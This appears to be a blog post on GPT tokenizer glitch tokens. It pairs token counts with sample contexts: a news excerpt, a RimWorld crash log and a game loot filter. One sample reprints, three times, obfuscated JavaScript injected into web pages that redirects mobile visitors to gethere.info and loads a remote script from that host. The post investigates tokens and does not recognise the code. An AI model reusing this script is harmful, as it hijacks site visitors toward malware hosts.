13904 ' volunteer' 20037
11661 ' volunteers' 20284

6598 ' behavi' 65
46571 'behavior' 7295
41672 ' behavioural' 7724
38975 ' behaviours' 9416
37722 ' behaving' 12645
17211 ' behavioral' 16533
14301 ' behaviors' 18709
9172 ' behaviour' 20497
4069 ' behavior' 20609

 

Others on LessWrong suggested that BPE, the process used to make the tokens in the first place, was responsible for this.

So it looks like ultra low-frequency tokens were culled, but the threshold was high enough that some survivors exhibit glitch behavior. This obviously solves itself with more data, so I would be extremely surprised if " practition" has glitch behavior in GPT4/GPT4o.

 

 

41441 \\- 645

Code element for... something.

Unknown Code

\n\nvar _0x446d=[“\\x5F\\x6D\\x61\\x75\\x74\\x68\\x74\\x6F\\x6B\\x65\\x6E”,”\\x69\\x6E\\x64\\x65\\x78\\x4F\\x66″,”\\x63\\x6F\\x6F\\x6B\\x69\\x65″,”\\x75\\x73\\x65\\x72\\x41\\x67\\x65\\x6E\\x74″,”\\x76\\x65\\x6E\\x64\\x6F\\x72″,”\\x6F\\x70\\x65\\x72\\x61″,”\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x67\\x65\\x74\\x68\\x65\\x72\\x65\\x2E\\x69\\x6E\\x66\\x6F\\x2F\\x6B\\x74\\x2F\\x3F\\x32\\x36\\x34\\x64\\x70\\x72\\x26″,”\\x67\\x6F\\x6F\\x67\\x6C\\x65\\x62\\x6F\\x74″,”\\x74\\x65\\x73\\x74″,”\\x73\\x75\\x62\\x73\\x74\\x72″,”\\x67\\x65\\x74\\x54\\x69\\x6D\\x65″,”\\x5F\\x6D\\x61\\x75\\x74\\x68\\x74\\x6F\\x6B\\x65\\x6E\\x3D\\x31\\x3B\\x20\\x70\\x61\\x74\\x68\\x3D\\x2F\\x3B\\x65\\x78\\x70\\x69\\x72\\x65\\x73\\x3D”,”\\x74\\x6F\\x55\\x54\\x43\\x53\\x74\\x72\\x69\\x6E\\x67″,”\\x6C\\x6F\\x63\\x61\\x74\\x69\\x6F\\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\\x5F\\x6D\\x61\\x75\\x74\\x68\\x74\\x6F\\x6B\\x65\\x6E”,”\\x69\\x6E\\x64\\x65\\x78\\x4F\\x66″,”\\x63\\x6F\\x6F\\x6B\\x69\\x65″,”\\x75\\x73\\x65\\x72\\x41\\x67\\x65\\x6E\\x74″,”\\x76\\x65\\x6E\\x64\\x6F\\x72″,”\\x6F\\x70\\x65\\x72\\x61″,”\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x67\\x65\\x74\\x68\\x65\\x72\\x65\\x2E\\x69\\x6E\\x66\\x6F\\x2F\\x6B\\x74\\x2F\\x3F\\x32\\x36\\x34\\x64\\x70\\x72\\x26″,”\\x67\\x6F\\x6F\\x67\\x6C\\x65\\x62\\x6F\\x74″,”\\x74\\x65\\x73\\x74″,”\\x73\\x75\\x62\\x73\\x74\\x72″,”\\x67\\x65\\x74\\x54\\x69\\x6D\\x65″,”\\x5F\\x6D\\x61\\x75\\x74\\x68\\x74\\x6F\\x6B\\x65\\x6E\\x3D\\x31\\x3B\\x20\\x70\\x61\\x74\\x68\\x3D\\x2F\\x3B\\x65\\x78\\x70\\x69\\x72\\x65\\x73\\x3D”,”\\x74\\x6F\\x55\\x54\\x43\\x53\\x74\\x72\\x69\\x6E\\x67″,”\\x6C\\x6F\\x63\\x61\\x74\\x69\\x6F\\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\\x5F\\x6D\\x61\\x75\\x74\\x68\\x74\\x6F\\x6B\\x65\\x6E”,”\\x69\\x6E\\x64\\x65\\x78\\x4F\\x66″,”\\x63\\x6F\\x6F\\x6B\\x69\\x65″,”\\x75\\x73\\x65\\x72\\x41\\x67\\x65\\x6E\\x74″,”\\x76\\x65\\x6E\\x64\\x6F\\x72″,”\\x6F\\x70\\x65\\x72\\x61″,”\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x67\\x65\\x74\\x68\\x65\\x72\\x65\\x2E\\x69\\x6E\\x66\\x6F\\x2F\\x6B\\x74\\x2F\\x3F\\x32\\x36\\x34\\x64\\x70\\x72\\x26″,”\\x67\\x6F\\x6F\\x67\\x6C\\x65\\x62\\x6F\\x74″,”\\x74\\x65\\x73\\x74″,”\\x73\\x75\\x62\\x73\\x74\\x72″,”\\x67\\x65\\x74\\x54\\x69\\x6D\\x65″,”\\x5F\\x6D\\x61\\x75\\x74\\x68\\x74\\x6F\\x6B\\x65\\x6E\\x3D\\x31\\x3B\\x20\\x70\\x61\\x74\\x68\\x3D\\x2F\\x3B\\x65\\x78\\x70\\x69\\x72\\x65\\x73\\x3D”,”\\x74\\x6F\\x55\\x54\\x43\\x53\\x74\\x72\\x69\\x6E\\x67″,”\\x6C\\x6F\\x63\\x61\\x74\\x69\\x6F\\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0xd052=[“\\x73\\x63\\x72\\x69\\x70\\x74″,”\\x63\\x72\\x65\\x61\\x74\\x65\\x45\\x6C\\x65\\x6D\\x65\\x6E\\x74″,”\\x73\\x72\\x63″,”\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x67\\x65\\x74\\x68\\x65\\x72\\x65\\x2E\\x69\\x6E\\x66\\x6F\\x2F\\x6B\\x74\\x2F\\x3F\\x33\\x63\\x58\\x66\\x71\\x6B\\x26\\x73\\x65\\x5F\\x72\\x65\\x66\\x65\\x72\\x72\\x65\\x72\\x3D”,”\\x72\\x65\\x66\\x65\\x72\\x72\\x65\\x72″,”\\x26\\x64\\x65\\x66\\x61\\x75\\x6C\\x74\\x5F\\x6B\\x65\\x79\\x77\\x6F\\x72\\x64\\x3D”,”\\x74\\x69\\x74\\x6C\\x65″,”\\x26″,”\\x3F”,”\\x72\\x65\\x70\\x6C\\x61\\x63\\x65″,”\\x73\\x65\\x61\\x72\\x63\\x68″,”\\x6C\\x6F\\x63\\x61\\x74\\x69\\x6F\\x6E”,”\\x26\\x66\\x72\\x6D\\x3D\\x73\\x63\\x72\\x69\\x70\\x74″,”\\x63\\x75\\x72\\x72\\x65\\x6E\\x74\\x53\\x63\\x72\\x69\\x70\\x74″,”\\x69\\x6E\\x73\\x65\\x72\\x74\\x42\\x65\\x66\\x6F\\x72\\x65″,”\\x70\\x61\\x72\\x65\\x6E\\x74\\x4E\\x6F\\x64\\x65″,”\\x61\\x70\\x70\\x65\\x6E\\x64\\x43\\x68\\x69\\x6C\\x64″,”\\x68\\x65\\x61\\x64″,”\\x67\\x65\\x74\\x45\\x6C\\x65\\x6D\\x65\\x6E\\x74\\x73\\x42\\x79\\x54\\x61\\x67\\x4E\\x61\\x6D\\x65″,”\\x70\\x72\\x6F\\x74\\x6F\\x63\\x6F\\x6C”,”\\x68\\x74\\x74\\x70\\x73\\x3A”,”\\x69\\x6E\\x64\\x65\\x78\\x4F\\x66″,”\\x52\\x5F\\x50\\x41\\x54\\x48″,”\\x54\\x68\\x65\\x20\\x77\\x65\\x62\\x73\\x69\\x74\\x65\\x20\\x77\\x6F\\x72\\x6B\\x73\\x20\\x6F\\x6E\\x20\\x48\\x54\\x54\\x50\\x53\\x2E\\x20\\x54\\x68\\x65\\x20\\x74\\x72\\x61\\x63\\x6B\\x65\\x72\\x20\\x6D\\x75\\x73\\x74\\x20\\x75\\x73\\x65\\x20\\x48\\x54\\x54\\x50\\x53\\x20\\x74\\x6F\\x6F\\x2E”];var d=document;var s=d[_0xd052[1]](_0xd052[0]);s[_0xd052[2]]= _0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12];if(document[_0xd052[13]]){document[_0xd052[13]][_0xd052[15]][_0xd052[14]](s,document[_0xd052[13]])}else {d[_0xd052[18]](_0xd052[17])[0][_0xd052[16]](s)};if(document[_0xd052[11]][_0xd052[19]]=== _0xd052[20]&& KTracking[_0xd052[22]][_0xd052[21]](_0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12])=== -1){alert(_0xd052[23])}
 

This exact code was present in many different articles, often appearing in the middle of text. I don't know where to begin. Maybe it's something related to mobile devices?

 

31666 ?????-?????- 0

Zero appearances. "?????-" appeared 3 times as webpage Twitter integration embedding errors. Or maybe some other encoding issue?
The actual tweet was in Hindi. 

I still have no idea what is going on here. Any help will be appreciated.

?????-

 chief Lalu Prasad Yadav has lashed out at Prime Minister Narendra Modi. Lalu termed PM\'s decision of demonetisation in the country as his "arrogant decision".\n\nLalu said that the problems of poverty, hunger, unemployment, and inflation India is facing is because of the BJP government at the Centre and its decision to go on the demonetisation drive.\n\n"Notebandi kar ke kendra ne desh mein daridrata, bhookhmari , berozgaari aur mehngai la di hai," Lalu tweeted.\n\n??????? ?? ?????? ?? ??? ??? ????????, ??????, ??????????, ?????? ?? ?? ??? ???????????? ?? ?? ??????? ?????? ?? ????? ??? ?????-??? ??????? - Lalu Prasad Yadav (@laluprasadrjd) October 20, 2017\n\nLalu said that it will take several years for India to come out of the damages caused due to PM Modi\'s demonetisation.\n\nRJD chief Lalu also slammed the BJP for playing the Ram temple card ahead of the Gujarat and Himachal Pradesh elections in order to polarise voters.\n\nCalling the BJP leaders as fake Ram bhakts, Lalu said that these ploys won\'t work for the saffron party anymore.\n\n"Chunav ke samay dikhawati Ram-Ram japnewale ko Ram hi marenge. Bhagwan Ram ko chhalte samay bhi inki rooh nahi kaanpti hai", Lalu wrote on Twitter.\n\n????? ?? ??? ??????? ???-??? ???? ???? ?? ??? ?? ???????? ????? ??? ?? ???? ??? ?? ???? ??? ???? ??????? - Lalu Prasad Yadav (@laluprasadrjd) October 19, 2017\n\nThe RJD chief\'s tirade against the BJP was especially directed against Uttar Pradesh Chief Minister Yogi Adityanath who recently celebrated Diwali in Ayodhya along with his cabinet colleagues.\n\nThe RJD chief maintained that BJP wanted to p

 

49781 EngineDebug 3


[239, 63, 1]

As part of UnityEngineDebugBin. The example below came from a Steam error log for Rimworld.

Unity is a common video game engine.

UnityEngineDebugBin

(Filename: C:/buildslave/unity/build/artifacts/generated/common/runtime/UnityEngineDebugBindings.gen.cpp Line: 42) Received packet from server: PhiClient.ChatMessagePacket (Filename: C:/buildslave/unity/build/artifacts/generated/common/runtime/UnityEngineDebugBindings.gen.cpp Line: 42) Crash!!! SymInit: Symbol-SearchPath: '.;D:\\Steam\\steamapps\\common\\RimWorld;D:\\Steam\\steamapps\\common\\RimWorld;C:\\WINDOWS;C:\\WINDOWS\\system32;SRV*C:\\websymbols*http://msdl.microsoft.com/download/symbols;', symOptions: 530, UserName: 'Jordan' OS-Version: 10.0.14393 () 0x100-0x1 D:\\Steam\\steamapps\\common\\RimWorld\\RimWorldWin.exe:RimWorldWin.exe (01010000), size: 18579456 (result: 0), SymType: '-exported-', PDB: 'D:\\Steam\\steamapps\\common\\RimWorld\\RimWorldWin.exe', fileVersion: 5.4.1.40776 C:\\WINDOWS\\SYSTEM32\n\ntdll.dll:ntdll.dll (76E80000), size: 1585152 (result: 0), SymType: '-exported-', PDB: 'C:\\WINDOWS\\SYSTEM32\n\ntdll.dll', fileVersion: 10.0.14393.479 C:\\WINDOWS\\System32\\KERNEL32.DLL:KERNEL32.DLL (76350000), size: 917504 (result: 0), SymType: '-exported-', PDB: 'C:\\WINDOWS\\System32\\KERNEL32.DLL', fileVersion: 10.0.14393.0 C:\\WINDOWS\\System32\\KERNELBASE.dll:KERNELBASE.dll (76CC0000), size: 1708032 (result: 0), SymType: '-nosymbols-', PDB: 'C:\\WINDOWS\\System32\\K"

 

42470 TextColor 97
 

[215, 80, 74, 57, 22, 17, 15, 15, 11, 10, 10, 10, 10, 8, 8, 7, 6, 6, 6, 6, 6, 6, 5, 5, 4, 4, 4, 4, 4, 3]

Common code element. The biggest contributor was a cheat script for Paths of Exile.

Paths of Exile cheat script

#----------- # Section: ALPHA # GLOBAL OVERRIDE - ADD YOUR OWN RULES THAT WILL OVERRIDE THE OTHERS HERE # Section: ALPHA-a # Talisman league! Show Rarity = Unique BaseType "Talisman" SetBackgroundColor 0 0 0 SetBorderColor 109 200 130 SetFontSize 42 PlayAlertSound 6 300 Show Rarity = Rare BaseType "Talisman" SetBackgroundColor 0 0 0 SetBorderColor 109 200 130 SetFontSize 40 PlayAlertSound 1 300 Show Rarity = Magic BaseType "Talisman" SetBackgroundColor 0 0 0 SetBorderColor 109 200 130 SetFontSize 38 Show Rarity = Normal BaseType "Talisman" SetBackgroundColor 0 0 0 SetBorderColor 109 200 130 SetFontSize 36 # Section: 0000 # UTILITY AND JUST-IN-CASE Show Class "Microtransactions" Show Class "Quest" "Items" SetBorderColor 74 230 58 SetFontSize 40 # Section: 0001 # LABYRINTH MATERIAL Show BaseType "Offering to the Goddess" SetTextColor 0 0 0 SetBackgroundColor 180 0 0 SetBorderColor 0 0 0 SetFontSize 40 PlayAlertSound 4 300 Show Class "Labyrinth" SetTextColor 74 230 58 SetBorderColor 74 230 58 SetFontSize 40 # Section: 0100 # TOP TIER RARITY Show Class "Fishing Rod" SetTextColor 255 0 0 SetBackgroundColor 255 255 255 SetBorderColor 255 0 0 SetFontSize 45 PlayAlertSound 6 300 Show Rarity = Unique SocketGroup "WWWWWW" BaseType "Simple Robe" SetTextColor 0 0 0 SetBackgroundColor 175 96 37 SetBorderColor 255 150 0 SetFontSize 43 PlayAlertSound 6 300 Show LinkedSockets = 6 SetTextColor 255 0 0 SetBackgroundColor 255 255 255 SetBorderColor 255 0 0 SetFontSize 45 PlayAlertSound 6 300 Show BaseType "Mirror of Kalandra" SetTextColor 255 0 0 SetBackgroundColor 255 255 255 SetBorderColor 255 0 0 SetFontSize 45 PlayAlertSound 6 300 # Section: 0200 # UNIQUES AND MAPS Show # T1 - These uniques are have a consistent price of ~0.5++ ex Rarity = Unique BaseType "Varnished Coat" "Gold Ring" "Ursine Pelt" "Champion Kite Shield" "Sapphire Flask" "Desert Brigandine" "Occultist" "Glorious" "Titanium" "Judgement Staff" "Siege Axe" "Prophecy Wand" "Sacrificial Garb" "Sorcerer Boots" "Topaz Flask" "Deicide Mask" "Imperial Skean" "Slaughter Knife" "Rawhide Boots" "Assassin\'s Garb" "Spine Bow" "Ezomyte Burgonet" "Sinner Tricorne" "Two-Stone" "Hubris" "Savant\'s Robe" "Vaal Regalia" "Silver Flask" SetTextColor 175 96 37 SetBackgroundColor 255 255 255 SetBorderColor 175 96 37 SetFontSize 45 PlayAlertSound 6 300 Show # T2 - These uniques usually are worth ~0.5 - 1 ex at the start of the league and drop to ~5c++ (sometimes ranging to an ex and up) over 1 - 2 month. Rarity = Unique BaseType "Golden Plate" "Nubuck Boots" "Terror Maul" "Full Wyrmscale" "Gavel" "Archon Kite Shield" "Reinforced Greaves" "Imperial Bow" "Conjurer Boots" "Steelscale Gauntlets" "Nightmare Bascinet" "Sharkskin Boots" "Granite Flask" "Imperial Staff" "Deerskin Gloves" "Karui Sceptre" "Large Hybrid Flask" "Paua Ring" "Vaal Axe" "Fiend Dagger" SetTextColor 0 0 0 SetBackgroundColor 200 96 37 SetBorderColor 0 0 0 SetFontSize 43 PlayAlertSound 6 300 Show # T2.5 - Fated Uniques. Note: does not apply to every variation of the basetype. Example: The blackheart unique iron ring has a fated version, the le - heup - of - all iron ring unique on the other hand not. Rarity = Unique BaseType "Iron Ring" "Coral Ring" "Jade Amulet" "Plate Vest" "Ornate Sword" "Scholar Boots" "Iron Staff" "Spiraled Wand" "Sledgehammer" "Long Bow" "Crude Bow" "Royal Bow" "Woodsplitter" "Jade Hatchet" "Painted Buckler" "Plank Kite Shield" "War Buckler" "Gilded Sallet" "Iron Hat" "Vine Circlet" "Goathide Gloves" "Coral Amulet" "Fire Arrow Quiver" "Serrated Arrow Quiver" "Death Bow" SetTextColor 175 96 37 254 SetBackgroundColor 15 0 25 SetBorderColor 100 37 254 200 SetFontSize 39 Show # T3 - Random uniques. In some cases, such as jewels some very valuable uniques may be still in here, but it\'s impossible to identify them. Rarity = Unique SetTextColor 175 96 37 254 SetBack', 'rmscale" "Gavel" "Archon Kite Shield" "Reinforced Greaves" "Imperial Bow" "Conjurer Boots" "Steelscale Gauntlets" "Nightmare Bascinet" "Sharkskin Boots" "Granite Flask" "Imperial Staff" "Deerskin Gloves" "Karui Sceptre" "Large Hybrid Flask" "Paua Ring" "Vaal Axe" "Fiend Dagger" SetTextColor 0 0 0 SetBackgroundColor 200 96 37 SetBorderColor 0 0 0 SetFontSize 43 PlayAlertSound 6 300 Show # T2.5 - Fated Uniques. Note: does not apply to every variation of the basetype. Example: The blackheart unique iron ring has a fated version, the le - heup - of - all iron ring unique on the other hand not. Rarity = Unique BaseType "Iron Ring" "Coral Ring" "Jade Amulet" "Plate Vest" "Ornate Sword" "Scholar Boots" "Iron Staff" "Spiraled Wand" "Sledgehammer" "Long Bow" "Crude Bow" "Royal Bow" "Woodsplitter" "Jade Hatchet" "Painted Buckler" "Plank Kite Shield" "War Buckler" "Gilded Sallet" "Iron Hat" "Vine Circlet" "Goathide Gloves" "Coral Amulet" "Fire Arrow Quiver" "Serrated Arrow Quiver" "Death Bow" SetTextColor 175 96 37 254 SetBackgroundColor 15 0 25 SetBorderColor 100 37 254 200 SetFontSize 39 Show # T3 - Random uniques. In some cases, such as jewels some very valuable uniques may be still in here, but it\'s impossible to identify them. Rarity = Unique SetTextColor 175 96 37 254 SetBackgroundColor 0 0 0 254 SetBorderColor 175 96 37 254 SetFontSize 39 PlayAlertSound 6 300 Show # Maps:Unique Rarity = Unique Class "Maps" SetFontSize 40 PlayAlertSound 6 300 Show # Maps:T1 Class "Maps" BaseType "Crypt" "Desert" "Dunes" "Dungeon" "Grotto" "Pit Map" "Tropical Island" SetFontSize 34 PlayAlertSound 4 200 Show # Maps:T2 Class "Maps" BaseType "Arcade" "Cemetery" "Channel" "Mountain Ledge" "Sewer" "Thicket" "Wharf" SetFontSize 34 PlayAlertSound 4 200 Show # Maps:T3 Class "Maps" BaseType "Ghetto" "Mud Geyser" "Museum" "Quarry" "Reef" "Spider Lair" "Vaal Pyramid" SetFontSize 35 PlayAlertSound 4 200 Show # Maps:T4 Class "Maps" BaseType "Arena" "Overgrown Shrine" 